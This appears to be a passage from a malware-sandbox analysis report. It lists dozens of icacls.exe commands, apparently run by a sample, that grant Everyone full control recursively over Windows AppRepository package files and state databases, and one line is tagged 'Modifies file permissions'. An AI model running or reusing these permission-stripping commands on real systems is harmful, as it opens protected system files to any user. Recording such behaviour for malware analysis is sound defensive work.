-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Microsoft3DViewer_1.1702.21039.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftEdge_40.15063.0.0_neutral__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftOfficeHub_2017.311.255.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MSPaint_1.1702.28017.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Office.OneNote_2015.7668.58071.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_2017.222.1920.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.PPIProjection_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_~_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.StorePurchaseApp_1.0.454.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.VCLibs.140.00_14.0.24123.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.VCLibs.140.00_14.0.24123.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Photos_2016.511.9510.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_2017.203.236.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_2017.203.236.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_2017.131.1904.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCamera_2017.125.40.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\microsoft.windowscommunicationsapps_2015.7906.42257.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_2017.209.105.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_2017.130.1208.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_2017.130.1208.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsStore_11701.1001.874.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_2017.113.1250.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxIdentityProvider_2016.719.1035.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_2019.16112.11621.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_2019.16112.11601.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-shm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-wal /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-shm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-wal /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
